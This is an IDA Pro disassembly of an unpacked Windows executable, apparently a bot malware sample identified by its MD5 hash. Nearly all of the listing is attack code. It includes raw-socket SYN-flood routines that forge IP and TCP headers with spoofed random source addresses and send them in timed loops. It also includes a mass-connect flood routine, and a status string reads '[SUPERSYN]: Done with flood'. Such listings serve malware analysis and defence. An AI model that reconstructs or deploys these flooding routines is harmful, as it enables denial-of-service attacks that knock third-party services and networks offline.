;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 6CE9501B368971EA10A0C0D7DB30F92E
; File Name : u:\work\6ce9501b368971ea10a0c0d7db30f92e_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00020290 ( 131728.)
; Section size in file : 00020290 ( 131728.)
; Offset to raw data for section: 00001000
; Flags E0000040: Data Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_0 segment para public 'CODE' use32
assume cs:_0
;org 401000h
assume es:nothing, ss:nothing, ds:_0, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; DATA XREF: sub_40D2E0+3A15�o
var_494 = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_8C = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0A5h
mov esi, eax
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call ds:dword_422048 ; GetTickCount
push eax
call sub_4154D2
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_28C]
push eax
call sub_4013EC
add esp, 14h
push eax
lea eax, [ebp+var_494]
push offset dword_424040
push eax
call sub_415480
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_401093
push esi
lea eax, [ebp+var_494]
push [ebp+var_C]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_294]
call sub_40BAE7
add esp, 14h
loc_401093: ; CODE XREF: sub_401000+71�j
lea eax, [ebp+var_494]
push eax
call sub_40A5B3
push [ebp+var_290]
call sub_415248
pop ecx
pop ecx
push esi
call ds:dword_422044 ; ExitThread
pop edi
pop esi
sub_401000 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010B5 proc near ; CODE XREF: sub_4013EC+40�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call ds:dword_4363E0 ; WSAStartup
test eax, eax
jz short loc_4010F5
xor eax, eax
jmp loc_4013E8
; ---------------------------------------------------------------------------
loc_4010F5: ; CODE XREF: sub_4010B5+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call ds:dword_43650C ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_20], eax
jz loc_4013E0
push esi
lea ecx, [ebp+var_40]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_40], edi
call ds:dword_436448 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_4013D6
push [ebp+arg_C]
mov [ebp+var_58], 2
call ds:dword_436468 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_56], ax
mov [ebp+var_54], esi
mov [ebp+var_34], 45h
call ds:dword_436468 ; htons
push [ebp+arg_C]
mov [ebp+var_32], ax
mov [ebp+var_30], di
mov [ebp+var_2E], bx
mov [ebp+var_2C], 80h
mov [ebp+var_2B], 6
mov [ebp+var_2A], bx
mov [ebp+var_24], esi
call ds:dword_436468 ; htons
mov [ebp+var_12], ax
call sub_4154DC
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call ds:dword_436468 ; htons
push 12345678h
mov [ebp+var_14], ax
call ds:dword_436464 ; htonl
push offset dword_4240C0
mov [ebp+var_10], eax
push [ebp+arg_8]
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_4011C5
mov [ebp+var_C], ebx
mov [ebp+var_7], 2
jmp short loc_401219
; ---------------------------------------------------------------------------
loc_4011C5: ; CODE XREF: sub_4010B5+105�j
push (offset loc_4240B3+1)
push [ebp+arg_8]
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_4011E1
mov [ebp+var_C], ebx
mov [ebp+var_7], 10h
jmp short loc_401219
; ---------------------------------------------------------------------------
loc_4011E1: ; CODE XREF: sub_4010B5+121�j
push (offset loc_4240A7+1)
push [ebp+arg_8]
call sub_4158A0
pop ecx
test eax, eax
pop ecx
jnz short loc_401219
call sub_4154DC
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_C], edx
call sub_4154DC
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_7], dl
loc_401219: ; CODE XREF: sub_4010B5+10E�j
; sub_4010B5+12A�j ...
push 4000h
mov [ebp+var_8], 50h
call ds:dword_436468 ; htons
mov [ebp+var_6], ax
lea eax, [ebp+var_48]
push eax
mov [ebp+var_2], bx
mov [ebp+arg_8], ebx
call ds:dword_422050 ; QueryPerformanceFrequency
lea eax, [ebp+var_1C]
push eax
call ds:dword_42204C ; QueryPerformanceCounter
push [ebp+var_44]
mov eax, [ebp+arg_10]
cdq
push [ebp+var_48]
push edx
push eax
call sub_415930
add eax, [ebp+var_1C]
push 14h
pop esi
adc edx, [ebp+var_18]
mov [ebp+var_3C], eax
mov [ebp+var_38], edx
loc_401267: ; CODE XREF: sub_4010B5+2E2�j
; sub_4010B5+2F0�j
mov [ebp+var_4], bx
call sub_4154DC
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call ds:dword_436468 ; htons
mov [ebp+var_14], ax
call sub_4154DC
mov edi, eax
shl edi, 10h
call sub_4154DC
or edi, eax
push edi
call ds:dword_436468 ; htons
movzx eax, ax
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call ds:dword_436464 ; htonl
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push esi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call ds:dword_436468 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_28]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_415560
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_94]
push eax
call sub_415560
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40957F
mov [ebp+var_4], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_415560
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_415560
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_415500
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40957F
mov [ebp+var_2A], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_415560
add esp, 14h
lea eax, [ebp+var_58]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_20]
call ds:dword_4364CC ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_4013AA
add [ebp+arg_8], eax
lea eax, [ebp+var_1C]
push eax
call ds:dword_42204C ; QueryPerformanceCounter
mov eax, [ebp+var_18]
cmp eax, [ebp+var_38]
jg short loc_4013D3
jl loc_401267
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_3C]
jnb short loc_4013D3
jmp loc_401267
; ---------------------------------------------------------------------------
loc_4013AA: ; CODE XREF: sub_4010B5+2CB�j
call ds:dword_4363FC ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset loc_424078
push eax
call sub_415480
lea eax, [ebp+var_F4]
push eax
call sub_40A5B3
add esp, 10h
jmp short loc_4013D6
; ---------------------------------------------------------------------------
loc_4013D3: ; CODE XREF: sub_4010B5+2E0�j
; sub_4010B5+2EE�j
mov ebx, [ebp+arg_8]
loc_4013D6: ; CODE XREF: sub_4010B5+78�j
; sub_4010B5+31C�j
push [ebp+var_20]
call ds:dword_436500 ; closesocket
pop esi
loc_4013E0: ; CODE XREF: sub_4010B5+5B�j
call ds:dword_4363C8 ; WSACleanup
mov eax, ebx
loc_4013E8: ; CODE XREF: sub_4010B5+3B�j
pop edi
pop ebx
leave
retn
sub_4010B5 endp
; =============== S U B R O U T I N E =======================================
sub_4013EC proc near ; CODE XREF: sub_401000+4F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_409410
push [esp+10h+arg_4]
mov esi, eax
call sub_4159EF
push [esp+14h+arg_C]
mov ebx, eax
call sub_4159EF
mov edi, eax
call sub_4154DC
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
push [esp+20h+arg_8]
lea eax, [edx+esi+100h]
push eax
push esi
call sub_4010B5
add esp, 20h
test eax, eax
jnz short loc_40143B
push 1
pop eax
loc_40143B: ; CODE XREF: sub_4013EC+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4013EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40144A proc near ; DATA XREF: sub_40D2E0+3C03�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
push ebx
push esi
mov eax, [ebp+arg_0]
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_1BC]
push 1
pop ebx
push 0FFh
push 3
rep movsd
push 2
mov [eax+19Ch], ebx
call ds:dword_4364E8 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_4014E5
call ds:dword_4363FC ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset loc_424204
push eax
call sub_415480
xor edi, edi
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_4014C8
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40BAE7
add esp, 14h
loc_4014C8: ; CODE XREF: sub_40144A+5C�j
lea eax, [ebp+var_3BC]
push eax
call sub_40A5B3
push [ebp+var_38]
call sub_415248
pop ecx
pop ecx
push edi
call ds:dword_422044 ; ExitThread
loc_4014E5: ; CODE XREF: sub_40144A+3A�j
lea ecx, [ebp+var_C]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_C], ebx
call ds:dword_436448 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_40155C
call ds:dword_4363FC ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push (offset loc_4241BB+1)
push eax
call sub_415480
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_40153F
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40BAE7
add esp, 14h
loc_40153F: ; CODE XREF: sub_40144A+D3�j
lea eax, [ebp+var_3BC]
push eax
call sub_40A5B3
push [ebp+var_38]
call sub_415248
pop ecx
pop ecx
push edi
call ds:dword_422044 ; ExitThread
loc_40155C: ; CODE XREF: sub_40144A+B3�j
lea eax, [ebp+var_1B8]
push eax
call ds:dword_4364A8 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_4015C3
lea eax, [ebp+var_3BC]
push (offset loc_42418B+1)
push eax
call sub_415480
cmp [ebp+var_24], edi
pop ecx
pop ecx
jnz short loc_4015A6
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40BAE7
add esp, 14h
loc_4015A6: ; CODE XREF: sub_40144A+13A�j
lea eax, [ebp+var_3BC]
push eax
call sub_40A5B3
push [ebp+var_38]
call sub_415248
pop ecx
pop ecx
push edi
call ds:dword_422044 ; ExitThread
loc_4015C3: ; CODE XREF: sub_40144A+122�j
push 10h
lea eax, [ebp+var_1C]
push edi
push eax
call sub_415500
add esp, 0Ch
mov [ebp+var_1C], 2
push edi
call ds:dword_436468 ; htons
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call ds:dword_4364A8 ; inet_addr
mov esi, ds:dword_422048
mov [ebp+var_18], eax
mov [ebp+arg_0], edi
call esi ; GetTickCount
mov [ebp+var_8], eax
loc_401601: ; CODE XREF: sub_40144A+2E8�j
call esi ; GetTickCount
sub eax, [ebp+var_8]
xor edx, edx
mov ecx, 3E8h
div ecx
cmp eax, [ebp+var_30]
ja loc_4017AC
push 41Ch
mov ds:byte_4321A8, 45h
call ds:dword_436468 ; htons
cmp [ebp+var_2C], edi
mov ds:word_4321AA, ax
mov ds:word_4321AC, bx
mov ds:word_4321AE, di
mov ds:byte_4321B0, 80h
mov ds:byte_4321B1, bl
mov ds:word_4321B2, di
jz short loc_401687
call sub_4154DC
mov ebx, eax
shl ebx, 8
call sub_4154DC
add ebx, eax
shl ebx, 8
call sub_4154DC
add ebx, eax
shl ebx, 8
call sub_4154DC
add ebx, eax
push 1
mov ds:dword_4321B4, ebx
pop ebx
jmp short loc_40169F
; ---------------------------------------------------------------------------
loc_401687: ; CODE XREF: sub_40144A+20B�j
push [ebp+var_1BC]
call sub_409526
pop ecx
push eax
call ds:dword_4364A8 ; inet_addr
mov ds:dword_4321B4, eax
loc_40169F: ; CODE XREF: sub_40144A+23B�j
mov eax, [ebp+var_18]
mov ds:dword_4321B8, eax
call sub_4154DC
cdq
mov ecx, 100h
idiv ecx
mov ds:byte_4321BC, dl
call sub_4154DC
cdq
mov ecx, 100h
idiv ecx
mov ds:byte_4321BD, dl
call sub_4154DC
cdq
mov ecx, 0F0h
push 400h
idiv ecx
mov ds:word_4321BE, di
mov ds:word_4321C2, bx
inc edx
mov ds:word_4321C0, dx
call sub_4154DC
cdq
mov ecx, 0FFh
idiv ecx
push edx
push offset dword_4321C4
call sub_415500
add esp, 0Ch
lea eax, [ebp+var_1C]
push 10h
push eax
push edi
push 41Ch
push offset byte_4321A8
push [ebp+var_4]
call ds:dword_4364CC ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_401737
inc [ebp+arg_0]
jmp loc_401601
; ---------------------------------------------------------------------------
loc_401737: ; CODE XREF: sub_40144A+2E3�j
push [ebp+var_4]
call ds:dword_436500 ; closesocket
call ds:dword_4363FC ; WSAGetLastError
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
push offset loc_42412C
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_4159FA
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_40178F
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40BAE7
add esp, 14h
loc_40178F: ; CODE XREF: sub_40144A+323�j
lea eax, [ebp+var_3BC]
push eax
call sub_40A5B3
push [ebp+var_38]
call sub_415248
pop ecx
pop ecx
push edi
call ds:dword_422044 ; ExitThread
loc_4017AC: ; CODE XREF: sub_40144A+1C8�j
push [ebp+var_4]
call ds:dword_436500 ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push offset dword_4240CC
push eax
call sub_415480
add esp, 1Ch
cmp [ebp+var_24], edi
jnz short loc_401814
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_40BAE7
add esp, 14h
loc_401814: ; CODE XREF: sub_40144A+3A8�j
lea eax, [ebp+var_3BC]
push eax
call sub_40A5B3
push [ebp+var_38]
call sub_415248
pop ecx
pop ecx
push edi
call ds:dword_422044 ; ExitThread
sub_40144A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401831 proc near ; DATA XREF: sub_40D2E0+159D�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_401992
add esp, 0Ch
push eax
lea eax, [ebp+var_414]
push offset aSupersynDoneWi ; "[SUPERSYN]: Done with flood (%iKB/sec)"
push eax
call sub_415480
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_4018B1
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_40BAE7
add esp, 14h
loc_4018B1: ; CODE XREF: sub_401831+5E�j
lea eax, [ebp+var_414]
push eax
call sub_40A5B3
push [ebp+var_10]
call sub_415248
pop ecx
pop ecx
push esi
call ds:dword_422044 ; ExitThread
pop edi
pop esi
sub_401831 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018D0 proc near ; CODE XREF: sub_401992+27�p
var_654 = byte ptr -654h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 654h
push 10h
lea eax, [ebp+var_14]
push 0
push eax
call sub_415500
add esp, 0Ch
mov [ebp+var_14], 2
push [ebp+arg_4]
call ds:dword_436468 ; htons
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_8]
test eax, eax
mov [ebp+var_4], 1
jle short loc_40198E
push ebx
push esi
push edi
mov [ebp+arg_4], eax
mov edi, 190h
loc_40191B: ; CODE XREF: sub_4018D0+B9�j
lea esi, [ebp+var_654]
mov ebx, edi
loc_401923: ; CODE XREF: sub_4018D0+7A�j
push 0
push 1
push 2
call ds:dword_422200 ; socket
cmp eax, 0FFFFFFFFh
mov [esi], eax
jz short loc_401946
lea ecx, [ebp+var_4]
push ecx
push 8004667Eh
push eax
call ds:dword_422204 ; ioctlsocket
loc_401946: ; CODE XREF: sub_4018D0+64�j
add esi, 4
dec ebx
jnz short loc_401923
lea esi, [ebp+var_654]
mov ebx, edi
loc_401954: ; CODE XREF: sub_4018D0+96�j
lea eax, [ebp+var_14]
push 10h
push eax
push dword ptr [esi]
call ds:dword_422208 ; connect
add esi, 4
dec ebx
jnz short loc_401954
push 64h
call ds:dword_422054 ; Sleep
lea esi, [ebp+var_654]
mov ebx, edi
loc_401978: ; CODE XREF: sub_4018D0+B4�j
push dword ptr [esi]
call ds:dword_42220C ; closesocket
add esi, 4
dec ebx
jnz short loc_401978
dec [ebp+arg_4]
jnz short loc_40191B
pop edi
pop esi
pop ebx
loc_40198E: ; CODE XREF: sub_4018D0+3E�j
xor eax, eax
leave
retn
sub_4018D0 endp
; =============== S U B R O U T I N E =======================================
sub_401992 proc near ; CODE XREF: sub_401831+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_409410
push [esp+10h+arg_4]
mov edi, eax
call sub_4159EF
push [esp+14h+arg_8]
mov ebx, eax
call sub_4159EF
mov esi, eax
push esi
push ebx
push edi
call sub_4018D0
add esp, 18h
test eax, eax
jnz short loc_4019C8
push 1
pop eax
loc_4019C8: ; CODE XREF: sub_401992+31�j
cdq
mov ecx, 3E8h
pop edi
idiv ecx
cdq
idiv esi
pop esi
pop ebx
retn
sub_401992 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4019D7 proc near ; DATA XREF: sub_40D2E0+3906�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_401D28
add esp, 0Ch
push eax
lea eax, [ebp+var_414]
push offset dword_424270
push eax
call sub_415480
xor esi, esi
add esp, 0Ch
cmp [ebp+var_8], esi
jnz short loc_401A57
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_40BAE7
add esp, 14h
loc_401A57: ; CODE XREF: sub_4019D7+5E�j
lea eax, [ebp+var_414]
push eax
call sub_40A5B3
push [ebp+var_10]
call sub_415248
pop ecx
pop ecx
push esi
call ds:dword_422044 ; ExitThread
pop edi
pop esi
sub_4019D7 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401A76 proc near ; CODE XREF: sub_401D28+3C�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = dword ptr -58h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call ds:dword_4363E0 ; WSAStartup
test eax, eax
jz short loc_401AB6
xor eax, eax
jmp loc_401D24
; ---------------------------------------------------------------------------
loc_401AB6: ; CODE XREF: sub_401A76+37�j
push 1
pop edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call ds:dword_43650C ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_401D1C
push esi
lea ecx, [ebp+var_38]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_38], edi
call ds:dword_436448 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_401D12
push 10h
lea eax, [ebp+var_50]
push ebx
push eax
call sub_415500
add esp, 0Ch
mov [ebp+var_50], 2
push [ebp+arg_8]
call ds:dword_436468 ; htons
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_4E], ax
mov [ebp+var_4C], esi
mov [ebp+var_20], 45h
call ds:dword_436468 ; htons
push [ebp+arg_8]
mov [ebp+var_1E], ax
mov [ebp+var_1C], di
mov [ebp+var_1A], bx
mov [ebp+var_18], 80h
mov [ebp+var_17], 6
mov [ebp+var_16], bx
mov [ebp+var_10], esi
call ds:dword_436468 ; htons
push 4000h
mov [ebp+var_32], ax
mov [ebp+var_2C], ebx
mov [ebp+var_28], 50h
mov [ebp+var_27], 2
call ds:dword_436468 ; htons
mov [ebp+var_26], ax
lea eax, [ebp+var_40]
push eax
mov [ebp+var_22], bx
mov [ebp+arg_8], ebx
call ds:dword_422050 ; QueryPerformanceFrequency
lea eax, [ebp+var_8]
push eax
call ds:dword_42204C ; QueryPerformanceCounter
push [ebp+var_3C]
mov eax, [ebp+arg_C]
cdq
push [ebp+var_40]
push edx
push eax
call sub_415930
add eax, [ebp+var_8]
mov esi, edx
adc esi, [ebp+var_4]
mov [ebp+var_58], eax
loc_401BA1: ; CODE XREF: sub_401A76+25D�j
; sub_401A76+26B�j
mov [ebp+var_24], bx
call sub_4154DC
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call ds:dword_436468 ; htons
mov [ebp+var_34], ax
call sub_4154DC
mov edi, eax
shl edi, 10h
call sub_4154DC
or edi, eax
push edi
call ds:dword_436468 ; htons
movzx eax, ax
mov [ebp+var_30], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call ds:dword_436464 ; htonl
push 14h
mov [ebp+var_14], eax
mov eax, [ebp+var_10]
pop edi
push edi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call ds:dword_436468 ; htons
mov [ebp+var_6E], ax
mov eax, [ebp+var_14]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_415560
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_94]
push eax
call sub_415560
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40957F
mov [ebp+var_24], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_415560
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_415560
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_415500
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40957F
mov [ebp+var_16], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_415560
add esp, 14h
lea eax, [ebp+var_50]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_C]
call ds:dword_4364CC ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_401CE6
add [ebp+arg_8], eax
lea eax, [ebp+var_8]
push eax
call ds:dword_42204C ; QueryPerformanceCounter
mov eax, [ebp+var_4]
cmp eax, esi
jg short loc_401D0F
jl loc_401BA1
mov eax, [ebp+var_8]
cmp eax, [ebp+var_58]
jnb short loc_401D0F
jmp loc_401BA1
; ---------------------------------------------------------------------------
